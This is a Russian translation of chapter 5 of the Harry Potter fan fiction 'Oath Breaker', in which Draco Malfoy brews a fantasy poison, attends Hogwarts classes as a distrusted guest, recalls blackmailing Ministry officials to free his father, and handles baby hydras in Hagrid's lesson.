Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 5

«Ложная змеецветка: покрошить в маленькую плошку два листа болиголова, добавить щепотку мышьяка и вбить маленькое яйцо василиска. Вскипятить пинту чистой воды, положить три ягоды белладонны и пять раз помешать против часовой стрелки. Как только вода позеленеет, добавить смесь с яйцом. Держать на медленном огне, пятнадцать минут помешивая по часовой стрелке. Когда жидкость потемнеет, положить коготь виверны. Подождать, пока загустеет, и немедленно разлить по бутылям. За один раз выходит дюжина пузырьков жидкого зелья или одна доза смертельных испарений. Хранить в темном, прохладном месте».

Драко перечитал рецепт еще раз, чтобы убедиться, правильно ли все запомнил. За это зелье он не получит отметки, но если оно не сработает на поле боя, то Снейп и Дамблдор не замедлят сообщить ему об ошибке, которая, не говоря уже о репутации самого Драко, окажется ударом и по репутации его наставника. Юноша зевнул и потянулся за ингредиентами. Северус придерживался сурового расписания и настаивал, чтобы крестник успевал приготовить несколько зелий с утра, до начала занятий. Когда Драко увидел внушительный список ядов, порошков и кислот, которые потребовал Дамблдор, он не стал возражать.

Они со Снейпом трудились в гостиной Слизерина, подальше от шума и любопытных глаз, работая каждый над своим зельем по разные стороны огромного стола. Поглядев, с чем работает крестный, юноша узнал ингредиенты, необходимые для какой-то ядовитой кислоты, но что именно тот готовит, угадать не смог. Суровый взгляд Мастера зелий заставил Драко вернуться к работе.

Несмотря на сложность и нестабильность, в змеецветке не было ничего особенного. Нужно было всего-навсего по очереди добавлять ингредиенты и помешивать все в нужный момент. Считая минуты и глядя, как светло-зеленая жидкость становится темнее, юноша взял со стола маленькую бутылочку с тремя когтями виверны. Быстрые и злобные, эти ящеры ускользали от самых лучших охотников и были очень нелегкой добычей.  Найти их органы или хотя бы когти было чертовски трудно, даже за большие деньги. Драко удивился, что Северусу удалось раздобыть аж три штуки.

- Это был кто-то, кого мы знаем? – негромко спросил он, глядя сквозь стекло на загнутый, жемчужно-белый коготь размером с его мизинец.

Северус посмотрел на крестника и покачал головой:

- Нет, эти с мертвого ящера, что Хагрид обнаружил в лесу. Большая часть туши протухла, но когти мне удалось сберечь.

Вытряхнув один на ладонь, Драко поднес его поближе к глазам – так, чтобы свет заиграл на белой поверхности. Переливаясь, словно перламутр, гладкобокий коготь загибался, оканчиваясь острым кончиком. Настоящий крюк.

- Полукровка не превратился бы обратно, верно? После смерти, я имею в виду, - задумчиво произнес юноша.

Прекрасно зная, что Драко известен ответ, Северус не стал делать ему замечания. Добавив очередной ингредиент, он ответил:

- Если бы эта виверна была полукровкой, ей было бы не нужно превращаться обратно. Помесь настолько же ящер, насколько человек.

Драко снова поглядел на коготь, царапнул им ладонь, но после смерти животного его острота притупилась, и юноша осторожно опустил его в котел. Ожидая, пока зелье закипит, он еще раз посмотрел на принесенные Северусом банки. Кое-что понадобятся им уже сегодня, но содержимое нескольких, отставленных в сторону, не имело ничего общего с заданием Дамблдора. Старые монеты, несколько человечьих зубов и бутыль с неизвестно чьей кровью скромно уместились на углу стола. Для зелий из списка Северуса ничего из этого не пригодится.

- Зачем это? – не утерпел Драко.

- Ингредиенты, которые я не успеваю использовать, - отозвался Снейп, проследив за взглядом крестника. - В кабинете осталось еще кое-что, от чего мне придется избавиться, чтобы расчистить место, но я бы предпочел, чтобы они не пропадали зря. Делай с ними что хочешь. Если у тебя выйдет что-нибудь путное, я найду кому это пристроить на Дрянн-аллее.

Восприняв ответ как разрешение изобрести что-нибудь новенькое - какие-нибудь ядовитые зелья - Драко посмотрел на две книги, предусмотрительно убранные подальше от опасных субстанций на столе. Отцовский дневник лежал на их семейной летописи. Древний том беспокойно поеживался, вздымался и опадал, словно дыша. В этих книгах, которые Драко так хотелось взять на занятия вместо учебников, содержались сотни рецептов и заклятий. Рядом стояло его помело. Рукоятка казалась не такой серой как раньше, да и прутьев словно прибавилось. Скрепляющий их кожаный ремешок выглядел крепким и мягким, совсем не как те высохшие, расползающиеся лохмотья, когда Драко только нашел метлу. «Интересно, - подумал юноша, - если продолжать на ней летать, появятся ли на прутьях листья»? Более чем скромное на первый взгляд наследие Малфоев излучало такую мощь, что Драко захотелось провести весь год подальше ото всех, чтобы без помех подчинить эту силу своей воле.

- Хватит мечтать, - проворчал Северус. – Как только закончишь с зельем, ступай на занятия, - выудив пергамент с расписанием из лежащей перед ним стопки бумаг, он подтолкнул его к Драко. – Просто сядь в уголке, веди себя тихо, и  все оставят тебя в покое.

- А если не оставят? – не удержался юноша, прекрасно представляя, что может случиться с одиноким слизеринцем в полной недоброжелателей школе.

- Выпутывайся сам, - отозвался крестный. – Ты уже не маленький, а у меня есть дела поважнее, чем водить тебя за ручку, особенно учитывая, что тебе это и не требуется.

Они не стали покупать учебники, зная, что Драко будет просто присутствовать на занятиях и ему не придется выполнять задания, но юноша понадеялся, что крестный не записал его на что-нибудь ужасное, вроде Прорицания. Быстро проглядев расписание, он вздохнул. Усложненные Руны – легко, Уход за магическими животными – бессмысленно, потом перерыв на обед или библиотеку, Чары – хорошо, что не придется делать домашнюю работу, Зелья?..

- Кто такой этот Слагхорн?

- Новый профессор с сомнительными представлениями о морали, - мрачно хмыкнул Северус. – Учился в Слизерине. Но из соображений выгоды он быстро отгородился от своего бывшего факультета. Не доверяй ему. Он старается собрать возле себя самых лучших и многообещающих студентов, чтобы потом иметь возможность существовать за их счет, - и добавил, искоса взглянув на крестника. – Хотя, тебе, наверное, не о чем волноваться.

- А может, мне придется его палкой отгонять, - упрямо возразил Драко, очень сомневаясь в реальности подобной перспективы. – Странно, что ты не записал меня на Защиту, - он попытался сменить тему.

- Ты и так уже знаешь большинство заклятий, - ответил Снейп. – Тебе просто нужна практика, а ее я обеспечу.

Драко терпеть не мог практиковать контрзаклятья. Это неблагодарное занятие требовало умения мгновенно принимать решения, и чем сложнее было проклятье, тем труднее было его отразить. Драко же предпочитал нападать из засады и провоцировать противников, чтобы те разозлились и наделали ошибок. И хотя его умения росли, идея о дуэли со взрослым, могущественным и искушенным колдуном его вовсе не радовала. Он решил порыться в библиотеке и поискать всякие забытые трюки и уловки.

Когда он уже закупоривал пузырьки с ядом, зазвенел звонок. Запечатав последний, юноша прихватил со стола банку с грязными, покрытыми ржавчиной монетами. Прежде чем решать, что с ними сделать, их нужно как следует почистить и отполировать. Как раз этим можно будет заняться на уроках, вместо того чтобы притворяться, что он слушает преподавателей. Северус ничего не сказал на прощанье, и юноша покинул подземелья, пытаясь вспомнить, какие еще ингредиенты из хранилищ крестного можно будет использовать.

Большую часть пути Драко проделал по полузабытым коридорам, но кабинет Рун располагался посреди длинного холла, в этот час заполненного студентами. Решив не толкаться, а переждать, пока большая часть учеников разойдется, чтобы не так много народу пялилось на него, Драко остановился. Подняв капюшон, он сказал себе, что вовсе не прячется, а просто не хочет никого видеть.

Минуты шли, студентов меньше не становилось, и слизеринец нетерпеливо вздохнул. Раньше, когда за ним следовали Винс с Грегом, все торопились расступиться перед ними. Драко так привык к их присутствию, что забыл, какими высокими кажутся другие парни, и надеялся, что те тоже не заметят этого, пока Крэбб с Гойлом снова не появятся в школе. Они вернутся, - кивнул Драко сам себе, - должны. Без них ему ужасно одиноко. Северус его наставник, почти член семьи, но некоторые вещи можно рассказать только другу, такому же студенту.

Когда, наконец, в коридоре осталось всего несколько человек, Драко быстро зашел в класс, остро чувствуя на себе настороженные взгляды и старательно игнорируя их. Все разговоры тут же смолкли, но он, ни на кого не глядя, прошел в самый конец кабинета и сел там.

С удивлением обнаружив на соседнем стуле оставленный кем-то «Ежедневный пророк», юноша поднял и раскрыл газету. Ему в глаза сразу же бросился  заголовок: «Саботаж в Министерстве». Но, как выяснилось дальше, речь шла всего лишь о порчах, сделавших внутренние министерские сообщения совершенно неуправляемыми. На фотографии какой-то бедняга уворачивался от стайки настойчиво вьющихся вокруг него бумажных самолетиков. Сообщалось, что работа Министерства приостановлена, пока не будет найдено контрзаклинание.

«Обхохочешься, - подумал Драко, - такая глупая статейка, когда война в самом разгаре».

Рядом кто-то тяжело плюхнулся на стул, и юноша неприязненно посмотрел на незваного соседа, надеясь, что тот быстренько пересядет куда-нибудь подальше. Однако Грейнджер не сдвинулась с места и, кажется, даже не заметила его взгляда.

- Доброе утро, - сказала она, не обратив никакого внимания на отсутствие ответа. – О тебе на третьей странице, - кивнула она на газету.

Быстро перелистнув страницы, Драко замер. Сначала ему в глаза бросился снимок их разрушенного дома – по развалинам бродили хмурые авроры. Но взгляд юноши задержался на их семейной фотографии: он с отцом и матерью. Драко показалось, что этот снимок был сделан года три назад. Из-за положения и репутации Люциуса репортеры вечно преследовали их, стараясь добыть интересный кадр. Он посмотрел на себя – нахального и энергичного, каким он был до отцовского заключения, до вынужденного ухода из Хогвартса, до многомесячных интриг в Министерстве. Люциус улыбался, положив руку ему на плечо – еще не гордо, но словно обещая, что этот худощавый и дерзкий подросток вскоре станет кем-то много, много большим. Чуть позади них стояла мать, не касаясь, но ободряя своим присутствием. Драко наклонил голову. Для него это, определенно, выглядело как ободрение. Хотя все остальные, без сомнения, увидели бы лишь холодную усмешку и плохо скрываемое презрение. Легко коснувшись фотографии кончиками пальцев, он заставил себя обратить внимание на статью.

«Министерство магии обнародовало некоторые факты относительно пожара в имении Малфоев, в доме недавно освобожденного преступника Люциуса Малфоя. Бывший попечитель Хогвартса, некоторое время назад признанный Пожирателем смерти, Малфой был обвинен в пособничестве Сами-Знаете-Кому.

Эдвард Брекгейт, глава отдела по расследованию поджогов и пожаров, заявил: «Мы подозреваем, что пожар возник, когда в доме еще находились люди», - подтвердив тем самым версию о поджоге. В здании было обнаружено три тела, обгоревших до неузнаваемости.

«После беглого осмотра у нас нет причин думать, что тела принадлежат мистеру или миссис Малфой, - заявил Брекгейт. - Прежде чем можно будет точно сказать, кем являются погибшие и что именно произошло, необходимо тщательное расследование».

Кроме этих сведений никакой информации от официальных органов не поступало. Однако нам стало известно, что по крайней мере один Малфой избежал гибели. Драко, единственный сын и наследник Люциуса, в настоящее время находится в Хогвартсе, но не в качестве студента. Он воспользовался старинным законом о предоставлении убежища и сейчас наслаждается всеми удобствами своего положения в качестве гостя школы.

Внимательные читатели могут вспомнить, что убежище, о котором попросил Малфой, предоставляется только во время войны, и пока Министерство отказывается признавать, что нынешняя неспокойная обстановка представляет собой нечто большее, чем несколько актов гражданского неповиновения, шаг, на который отважился Дамблдор, выглядит более чем сомнительным. Еще более тревожным представляется вопрос о том, какое влияние семья  Малфоев может оказать на школу, особенно теперь, когда среди невинных детей находится сын известного Пожирателя, связанного с Сами-Знаете-Кем.

Наши требования об интервью с директором Хогвартса, с кем-либо из профессоров или самим Драко Малфоем были отклонены.

Ввиду отсутствия каких бы то ни было свидетельских показаний, у Министерства не так уж много зацепок относительно случившегося. Если кто-либо располагает сведениями о происшедшем, пожалуйста, свяжитесь с мистером Эдвардом Брекгейтом, главой отдела по расследованию поджогов и пожаров Министерства магии».

- Идиоты, - прошептал Драко и снова поглядел на свое фото с родителями. Те склонились к нему, словно защищая. Нисколько не заботясь, что шум может кого-то потревожить, юноша осторожно вырвал картинку из газеты, стараясь не повредить кромку. Как только материальное напоминание о родных оказалось у него в руках, он бережно убрал снимок в карман.

Больше в «Пророке» не оказалось ничего интересного, и юноша равнодушно запихнул его в стол. Сегодняшний урок был посвящен руне «othala», ее потенциалу и способам использования. Все это Драко знал вдоль и поперек, так что остаток занятия он посвятил полировке монет. Положив маленький диск на все еще слабую правую ладонь, он осторожно принялся очищать его краешком мантии. Ржавчина и грязь отслаивались мелкими чешуйками, пока, наконец, не показался серебряный краешек с полустертыми латинскими буквами на кромке.

- Значит, никто не подозревает, кто я? – прошептал он так, чтобы услышала только Грейнджер. Как ни противно ему было разговаривать с грязнокровкой, она была одной из немногих посвященных, кому было известно о происходящем. Северус почти ничего ему не рассказывал, лишь велел потерпеть и вести себя тихо. Уизли вообще не стоил внимания, а Поттер… с ним Драко точно не смог бы поговорить.

- Не больше чем раньше, - ответила девушка, не глядя на него, продолжая старательно переписывать текст с доски. – Но все удивляются, как тебе удалось вытащить отца из Азкабана. Ты… - она заговорила еще тише, - ты кого-то проклял?

- Кого, чиновников? – фыркнул Драко. – Сборище олухов, опасающихся за свое теплое местечко… они не стоят проклятья, - он зловеще улыбнулся. Мать и Северус и так знали, что он сделал, так что перед ними хвастаться было бессмысленно, отцу он едва успел объяснить все вкратце. А теперь у него появилась возможность не только рассказать о своих проделках, но и дать понять щенкам Дамблдора, что он, хоть он и находится среди них, совсем  не такой, как они.

- У отца был компромат на некоторых служащих Министерства, - негромко объяснил Драко. – Ты знала, что главный офицер отдела военной защиты и оборонных чар любит развлекаться в Лондоне с молоденькими магглами?

- В предпочтении магглов нет ничего плохого, - нахмурилась Грэнжер.

- Даже не принимая в расчет ужасный вкус, не думаю, что ее муж одобрил бы такие приключения. Так что она устроила, чтобы несколько документов, касающихся отца, бесследно затерялись, - рассказывая, Драко продолжал потихоньку очищать грязь с монеты и под его пальцами постепенно появлялся женский профиль. – Глава отдела колдовской торговли и обмена прикарманивает конфискованную контрабанду. Чтобы оказать мне любезность, он выступил с предложением о поправке к закону, позволяющей приговоренным Пожирателям…

- …повторно предстать перед судом под предлогом сфабрикованных улик и предвзятого отношения, проявленного в первый раз, - ахнула Грейнджер, распахнув глаза. – Я ужасно удивилась, прочитав об этом в новостях. Не могла понять, почему и зачем ему понадобилась такая поправка, и как ее приняли.

- Из страха, - объяснил Драко. – Они все боялись того, что я знаю о них. Главный следователь отдела по уничтожению темномагических артефактов так боялся, что все узнают о его полнейшей некомпетентности, что потерял все улики против отца. Без улик, без свидетелей и имея в составе суда троих колдунов, которые должны нам по несколько тысяч галлеонов, самым сложным было не выиграть дело, а заставить их всех потом молчать. Во всем мире едва ли найдется хоть один человек, у которого нет никаких скелетов в шкафу.

Сейчас это прозвучало так просто. Но, как услужливо подсказала Драко память, его шестой курс оказался далеко не простым. Удерживать чиновников в узде было труднее, чем гоняться на драконе за стаей перепуганных кроликов, в панике разбегающихся в разные стороны. Неделями Драко писал письма с вежливыми угрозами, напоминаниями о долгах, услугах и обязательствах, с обещаниями их простить, предупреждал, что случится с непокорными. Месяцами он терпеливо подкреплял свои угрозы личными визитами в Министерство. И пусть он был намного младше чиновников, его имя и знание их секретов довлели надо всеми. Весь тот год Драко едва успевал спать, ужасно похудел и кошмарно отстал в учебе.

Прозвенел звонок. Юноша подождал, пока класс опустеет, и только тогда вышел сам. Старательно ни на кого не глядя, он шагал по коридорам. Студенты расступались перед ним, разговоры смолкали, а за его спиной раздавался шепот. На секунду Драко захотелось насладиться их страхом, смаковать его, но он не смог, зная, что гораздо больше его способностей они опасаются, что его тьма запятнает и их.

«Словно прокаженного, – подумал Драко, - они страшатся меня, словно прокаженного, а вовсе не потому, почему стоит бояться».

Холодный ветер и относительная тишина двора стали желанным спасением от душного шума школы. Кто-то расчистил тропинку, ведущую от дверей к домику лесника, но чуть подтаявший снег утоптали, его прихватил морозец, и тропинка стала скользкой. Несколько человек попадали, торопясь на урок к Хагриду. Драко осторожно прошел мимо них, даже не поскользнувшись. В конце он сошел с тропы и прошагал до хижины прямо по снегу. Замотанные в шарфы студенты поеживались, сбившись тесной группкой. Драко же было тепло и уютно в его мантии, и он подумал, что не все могут позволить себе зачарованную одежду. Слизеринец нахмурился – прямо сейчас такая роскошь была недоступна и ему. Но очень скоро все изменится – пообещал себе юноша - и неважно, пустят его в семейные хранилища, или нет.

Драко было неинтересно, каких монстров приготовил на сегодня Хагрид. Полугигант сам легко мог сойти за наглядное пособие для урока. Но его ноги все еще болели и быстро уставали, а присесть здесь было некуда. Так что он обошел стоящих кругом студентов, подошел к стене хижины, откуда можно было хорошо разглядеть сегодняшних животных, и прислонился к ней. На дне большого деревянного ящика, стоявшего на снегу перед собравшимися, извивалось несколько дюжин змей, и Драко стало ясно, почему никто не торопится подойти ближе.

- Ничё страшного, - попытался успокоить студентов Хагрид. – Они не повылезают. Им снаружи холодновато будет.

- Кто они? - поинтересовался кто-то из Равенкло. – Обычные змеи?

- Не-а! – полугигант гордо улыбнулся, поглядев на шипящих созданий. – Эт новорожденные гидры. Оч редкие, такие водятся тока в средиземноморье. Пришлось заколдовать им ящик, чтоб теплый был, а то повымерзают детишки. Я их заказал еще до бурана, потому следующий урок надо будет устроить где-нить в тепле, чтобы вы смогли их рассмотреть хорошенько.

Гидры? Драко взглянул внимательнее. Черновато-зеленые тельца рептилий венчали по три головы с блестящими, ярко-красными глазками. Змейки любопытно таращились на людей, окруживших их обиталище. Драко подумалось, что они выглядят очень мило, когда покачивают своими крошечными головками и тихонько шипят. Складки вокруг мордочек ужасно походили на детские чепчики.

- Они оч дружелюбные, - заявил Хагрид, совершенно не замечая, что никто ему не верит. – Ну, первые месяцы. А потом начинают пожирать друг дружку, пока не остается кто-нить один.

Какая-то равенкловка, убедившись, что змейки не достают до верха ящика, подошла ближе и спросила:

- Они на самом деле ядовитые?

- Ну, ежели гидра тебя куснет, ты помрешь просто от ран, - жизнерадостно ответил Хагрид. – Но ядовитые они, эт да. Хотя от укусов таких крохотулек у вас разве что голова разболится, - он пододвинул ящик к девушке. – Давай, погладь-ка их.

- Что? – испуганно ахнула та.

- Счас они очень даже хорошие, - уверил гигант, ласково поскребя рептилию по головке. В ответ та довольно потерлась о его ладонь и взъерошила кожистые складочки вокруг головы. – Ежели вы к ним с лаской, так и они к вам.

С легкой завистью Драко наблюдал, как народ сгрудился вокруг ящика, чтобы поиграть с гидрами.

«Ну, разумеется, - мрачно подумал он, - раз в жизни этот идиот показал что-то стоящее, а я уже не студент». Судя по тому, как Хагрид его игнорировал, у Драко не было ни малейшего шанса даже пальцем притронуться к змейкам. Наверняка Северус уже успел обмолвиться, каким замечательным источником ингредиентов являются гидры, и перепугал великана до полусмерти.

Ну и ладно. У Драко начали дрожать ноги и заболела ладонь, там, куда вонзился шип. Вздохнув, юноша начал осторожно массировать ее, стараясь унять боль.

Может, уйти пораньше, раз он больше не студент? Но привлекать внимание тоже не хочется. Пожалуй, стоит дождаться конца занятия. Но если дрожь усилится, немедленно отправиться к Помфри.

- Эй, Малфой.

Драко замер. Как он умудрился не заметить Уизли? Рыжие волосы буквально огнем горели среди белоснежного окружения.

- Чего тебе?

- Хочу свалить отсюда побыстрее,- негромко ответил тот. – Дамблдор переделал наше расписание так, чтобы кто-то из нас постоянно был рядом с тобой. Он отправил меня сюда прямо с Чар.

- Я тут не при чем, - Драко небрежно пожал плечами. – Ты мне не нужен.

- Я заметил, ты не торопишься поиграть с гидрами, - Уизли заговорил громче, чтобы было слышно остальным, и стоящие рядом обернулись. – Боишься снова ручку поранить?

- Не думаю, что Хагрид меня к ним подпустит, - равнодушно отозвался Драко. – А то Снейп не отказался бы от парочки.

Рон открыл рот, собираясь ответить, но тут раздались крик и грохот. Девушка, стоявшая ближе всего к гидрам, отшатнулась, прижимая к груди окровавленную руку. Ее мантия зацепилась за ящик и тот перевернулся. Маленькие рептилии высыпали на снег.

- Спокойно! – Хагриду даже не понадобилось повышать голос, - Они просто перепужались. Помогите их собрать – ай! – и смотрите, не трожьте хвосты – ребятишки шустро оборачиваются – ай!

Большинство змеек, оказавшись на снегу, почти сразу остановились. Некоторые спрятались у студентов под ногами, где воздух был теплее, прочие старались увернуться от хватающих рук. Пока Уизли и остальные их собирали, осторожно вылавливая юрких созданий за шейки, Драко лениво наблюдал, как они подскакивают, чтобы не подставиться под укусы крошечных зубов. Вид прыгающего гиганта, окруженного такими же подпрыгивающими студентами, развеселил слизеринца, и несколько человек сердито обернулись на его смех.

Вдруг внимание юноши привлекло громкое шипение и он поглядел вниз. У его ног, видимо, стараясь убраться со снега, свернулась еще одна гидра - довольно крупная и, судя по размеру зубов, именно та, что цапнула студентку из Равенкло. Рептилия яростно шипела, раскачивая головами, словно собираясь укусить кого-нибудь снова. Заметив змейку возле слизеринца, Уизли поднял палочку.

- Стой смирно, Малфой. Я ее достану…

Не обратив на рыжего никакого внимания, Драко наклонился и просунул ладонь под маленькое тельце, осторожно подняв детеныша в воздух. Гидра обвила хвост вокруг его запястья и позволила юноше приподнять ее головки, так, чтоб она могла осмотреться или даже укусить. Он неторопливо погладил самую большую голову, зная, что все таращатся на него, и что Северус жутко рассердится, когда узнает о его выходке.

- Змея – герб нашей семьи. По-твоему, это просто потому, что мы любим змей?

Надеясь, что ноги не подведут его, Драко подошел и выпустил гидру обратно в ящик, побыстрее убрав руку, на случай, если та все же решит его цапнуть. Может, создание и доверяло ему, но он знал, как могут изувечить своих хозяев животные, якобы неспособные  причинить вред. А эта гидра выглядела достаточно взрослой, чтобы ее укусов стоило опасаться.

Посчитав, что привлек к себе достаточно внимания, Драко развернулся и направился к замку. Проходя мимо остальных, он услышал, как они перешептываются, гадая, что такого он сказал Уизли. К счастью, никто не расслышал его слов, так что еще оставалась надежда, что Северус не будет слишком рассержен.

К досаде юного Малофя, рыжий последовал за ним.

- Чего тебе еще? – недовольно поинтересовался Драко.

- У меня нет выбора, - отозвался Уизли, шагая рядом. – Дамблдор велел быть рядом с тобой.

- О, ради всего... - раздраженно вздохнул Драко. – Я знаю, что я плохой, злой и ем полукровок на завтрак, но обещаю вести себя хорошо, только отстань!

- Сказал паук мухе, - мрачно пробормотал Рон. Когда они подошли ближе к школе, он взглянул на слизеринца. – Ты не понял? Мы не студентов стараемся защитить, а тебя.

- Что? – Драко остановился как вкопанный и уставился на него.

Скривившись, словно собираясь заняться чем-то ужасно неприятным, Уизли схватил его за рукав и потянул за угол, подальше от любопытных взглядов.

- Мерлин видит, я тебе не доверяю и не знаю, почему Дамблдор считает тебя мало-мальски стоящим…

- Да как ты смеешь… - ощетинился Драко, но гриффиндорец перебил его.

- …но даже ты мог бы заметить, как на тебя все смотрят. Гермиона сказала, что ты видел последний выпуск «Пророка». Тебя подозревают все, Малфой, и если они узнают, что ты и в самом деле темный маг, тебе понадобится помощь. Напасть может кто угодно – студент, чей-то родитель, кто-то, приехавший повидаться с тобой.

- Тебе-то что? – Драко высвободил руку. – Ты не прочь увидеть меня мертвым.

- И лучше тебе помнить об этом, - процедил рыжий. – Но я видел, сколько зелий вы со Снейпом приготовили сегодня утром. В одиночку он бы никогда столько не сделал. Так что, как ни противно мне это признавать, ты нужен нам почти так же, как и мы тебе.

Драко отступил назад и поднял капюшон.

- Проваливай, - буркнул он. – Урок закончился, а к Помфри я доберусь без провожатого.

- Отлично, - с облегчением отозвался Уизли. – И в следующий раз постарайся не устраивать таких представлений. Теперь все будут болтать о твоей выходке.

- Я не сделал ничего… темного, - медленно произнес Драко. – И ты прекрасно это знаешь. Или твой отец действительно настолько бесполезен на работе и неспособен ничего тебе объяснить?

- Быть бесполезным для тебя - это очень даже неплохо, - самодовольно ухмыльнулся гриффиндорец, и стало ясно, что ему известно о безуспешных попытках Драко шантажировать его отца. – А вот насчет вашей семейки ходят такие слухи… Я всегда считал, что это пустая болтовня, что люди все выдумали, стараясь понять, почему вы такие мерзкие.

- К счастью, быть мерзким все еще очень выгодно, - надменно протянул Драко, зная, что рискует, провоцируя гриффиндорца, да еще там, где их никто не видит. И, развернувшись, пошел прочь, не желая проверять, на сколько еще Уизли хватит терпения, пока он не наплюет на все законы гостеприимства.

Драко добрался до лазарета как раз перед окончанием занятия. Увидев, что медсестра занята, он уселся на стул возле двери в ожидании своей очереди. В тепле дрожь усилилась и юноша, чуть ссутулившись, поплотнее завернулся в мантию. Через пару минут Помфри отправила свою пациентку прилечь, проследила, чтобы та устроилась поудобнее, и повернулась к слизеринцу.

- Я так и знала, что ты сегодня появишься, - сказала она, подходя к нему. – Что болит?

- Все, - пробормотал он. – И я никак не могу перестать дрожать.

Пока она осматривала его руку, он из последних сил старался сидеть спокойно. На бледной коже ладони с обеих сторон выделялась рваная линия шрама.

- Сожми кулак, - велела Помфри. Драко попытался, но пальцы не сгибались до конца. Медсестра потрогала его лоб. – Так будет еще какое-то время. Ты не на шутку подорвал здоровье и выздоровление займет больше времени, чем я надеялась, - она подошла к шкафчику с лекарствами возле своего стола и вытащила несколько пузырьков. – Я знаю, что профессор Снейп считает свои зелья самыми лучшими, но, честное слово…

Пока она смешивала ингредиенты, в дверях показались Хагрид и укушенная гидрой студентка. Драко сделал вид, что не заметил их. Помфри указала им на кресла рядом с ним и, к неудовольствию слизеринца, великан отважно загородил от него девушку, усевшись рядом. Поморщившись, юноша попытался унять дрожь. Нельзя одновременно быть грозным темным магом и дрожащим от слабости ребенком.

Помфри прервалась, чтобы вылечить укусы и дать девушке настойку от головной боли, и отправила ее прилечь.

- Тебе что-то нужно, Хагрид? – поинтересовалась она, закончив с пациенткой.

- Э-э… что-нить от укусов гидренышей, - отозвался тот, показывая руки, покрытые крошечными ранками. – Они малость осерчали во время урока.

Медсестра кивнула, решив, видимо, что чем меньше будет сказано, тем лучше. К облегчению Драко, она вернулась к его зелью, закончила смешивать ингредиенты, вылила все в маленькую бутылочку и наклеила ярлычок: «Малфой». Закупорив и несколько раз встряхнув склянку, она протянула ее Драко и велела:

- Сделай один глоток и, если опять почувствуешь себя плохо, приходи. Дать тебе лекарство с собой я не могу – там ядовитые корешки.

На вкус микстура оказалась такой отвратительной, что Драко едва не подавился, но сумел-таки ее проглотить. Спустя несколько секунд и боль в руке, и дрожь утихли.  Юноша отдал лекарство Помфри, запомнил, куда она его убрала, но уходить не спешил. Занятий у него пока не было, и к тому же ему не хотелось, чтобы вся школа знала, насколько он слаб. Если Уизли не соврал… слизеринец покачал головой. Зачем ему врать? Драко был уверен, что чертов предатель ненавидит его.

- Ты потому ушел? – вдруг обратился  к нему Хагрид. – Заболел?

Драко ссутулился еще больше.

- Просто захотел согреться.

- А… Я сперва думал, гидра и тя цапнула. Никогда не видал, чтоб они вот так давали себя держать. Ток я понял, если бы она тя вправду кусанула, ты б крик поднял, - Хагрид с подозрением уставился на юношу. – Ты ж не бушь за ними охотиться? А то Снейп обмолвился, как они хороши по частям…

Драко нахмурился, слушая разглагольствования Хагрида о том, что, по его мнению, темные маги делают с его обожаемыми зверюшками. Что могло быть нелепей? Он резко встал, накинул капюшон и, кивнув Помфри на прощанье, стремительно вышел из лазарета, направившись в библиотеку. Пускай великан считает его опасным грубияном. Все лучше, чем слушать его речи о том, какой Драко мерзкий.

Школа казалась совсем другой, когда он в одиночестве шел по коридорам. Шаги звучали слишком громко, из-за закрытых дверей классов доносилось невнятное эхо разговоров.

К радости Драко, кроме него в библиотеке никого не было, и сначала он бесцельно прошелся между стеллажей. Заметив в бестиарии книгу о гидрах, юноша вытащил ее и уселся в углу. Книга казалась старой, но одного взгляда на обложку было достаточно, чтобы понять, что ею никто никогда не интересовался. Открыв содержание, Драко начал шепотом читать заголовки:

- Геркулес и легендарная гидра. История гидр. Средиземноморские и южноамериканские разновидности… - наконец он заметил то, что искал.  – Использование гидр в темной магии.

Он перелистнул страницы и пожелтевшая от старости бумага захрустела. Рука больше не болела, так что, читая о разнообразных способах использования свежеумервщленных и сушеных гидр, юноша снова принялся полировать монеты.

Как обычно, тон повествования раздосадовал его. Труды, написанные нормальными волшебниками о темных магах, часто оказывались слишком драматичными и неодобрительными. Если верить им, Драко был лживым, расчетливым монстром, который обожал живьем сдирать с несчастных созданий кожу, воровать едва вылупившихся рептилий из гнезда, прямо на глазах у матери и готовить «отвратительные смертоносные снадобья», чтобы ради забавы убивать хороших, добрых волшебников.

Просто смехотворно. Зачем убивать, если можно отравить их и смотреть, как они мучаются? Так куда выгодней и для шантажа, и для мести.

Однако, закончив читать, он не только понял, как им с Северусом может пригодиться мертвая гидра, но и хорошенько отполировал две монеты. На посветлевшей блестящей поверхности одной из них Драко увидел полустертые очертания непривлекательного женского профиля: слишком большой нос, слишком выдающуюся челюсть. Он не любил читать на латыни, но мог в случае необходимости, и принялся разбирать едва видные на серебряной кромке буквы. Дата стерлась совершенно, но имя еще можно было прочесть – и, узнав его, юноша улыбнулся.

- Клеопатра… - прошептал он, погладив ее профиль. – История оказалась добра к тебе.

Прозвенел звонок. Драко поднял голову, ожидая, что вот-вот появятся равенкловцы, торопясь до обеда взять нужные книги. Вместо этого он увидел, что несколько студентов уже сидят за столами, торопливо отводя взгляд, стоит ему на них посмотреть. Тени были намного длиннее, чем должны быть в полдень. Драко выглянул в окно и нахмурился, увидев, как низко опустилось солнце.

Негромко выругавшись, он захлопнул книгу, поставил ее на место и направился к двери. Проигнорировав неодобрительный взгляд мадам Пинс, юноша посмотрел на часы над ее столом. Черт! Он пропустил Чары. Не то чтобы прогул волновал его сам по себе, но теперь у крестного будет уже два повода для недовольства.

Драко едва успел добраться до кабинета Зелий до начала урока. После того, что Северус рассказал о новом профессоре, он не собирался принимать активного участия в занятии и устроился в самом конце класса. Впереди он заметил Грейнджер и Уизли, но ни следа Поттера. Неудивительно, учитывая, что семикурсники изучали зелья повышенной сложности. Но, к его изумлению, запыхавшийся Поттер ввалился в класс вместе со звонком и мрачно покосился на Драко, бухнув сумку с книгами на стол.

- Где ты шлялся? - сердито прошипел он, устраиваясь неподалеку. – Ты должен был быть на Чарах!

- Зачитался в библиотеке, - ответил Малфой и, увидев, что Поттер подозрительно прищурился, пожал плечами: - Если тебя это утешит, то я и обед пропустил.

Это, кажется, несколько смягчило гриффиндорца, но не уняло его раздражения.

- Что такого интересного ты там нашел, чтобы пропускать занятия? Снейп спрашивал о тебе. Он разозлился, что ты прогулял.

- Я не прогуливал! – сердито шикнул Драко. – Просто хотел почитать, в каких зельях используют гидр.

